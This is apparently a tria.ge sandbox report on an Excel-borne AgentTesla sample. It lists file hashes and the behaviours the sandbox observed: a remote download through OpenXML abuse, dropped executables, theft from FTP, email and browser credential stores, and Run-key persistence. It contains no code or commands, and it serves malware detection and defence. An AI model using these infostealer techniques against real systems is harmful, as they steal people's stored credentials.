Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    8549cb420ed5c1edf32b7e28d9d2010dac4867c0dba3650e1f8e7655278d4c5b.zip

  • Size

    283KB

  • Sample

    240118-ghblmsdgcm

  • MD5

    a5df9baff836278a7b6ecf187976b190

  • SHA1

    ea8002dab926a32885cff76936baf1de60ea33b8

  • SHA256

    f8107dcd6388dddcd4133a3bd3bbfb6a12b5ce3b17b2b0b3ec59e23c9771ba5b

  • SHA512

    28684f07c21e47a662a4375850aa3d7ffa20c4782ec8d84c0df852bad79708aec5127c928fcdeaaded10a7c4149fa8cebbf2408d61573b5f38687b6e696a7a2d

  • SSDEEP

    6144:2xo4R4SpAmNYDBkUlXsv6RXL0d7K4r4HCj1TJzRyLZq:Qf5pAmiDlXgk87Kcbg8

Malware Config

Extracted

Family

agenttesla

Credentials

Targets

    • Target

      8549cb420ed5c1edf32b7e28d9d2010dac4867c0dba3650e1f8e7655278d4c5b.xls

    • Size

      302KB

    • MD5

      250841072f7bb27d6a75cd026249bb87

    • SHA1

      190342d9c712d9af9a3dce9eb3f2ff32bf100e23

    • SHA256

      8549cb420ed5c1edf32b7e28d9d2010dac4867c0dba3650e1f8e7655278d4c5b

    • SHA512

      27435486bd6eec7c591ec5388aec063d0ceb6f7198bda22dcb5c01dab11aaf878fa5d4b8723fefcb1983387e011100effd1e39d9e38f5b5511e2b1c997b788f0

    • SSDEEP

      6144:6vBNSHBMixiMK6G+ZFrTUvCp4sJgo0r6Rz4rN9RjymY7TaGv37Aodpz:6vBNQpozwjTqCfgo0ugNymWbvrf3

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Abuses OpenXML format to download file from external location

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks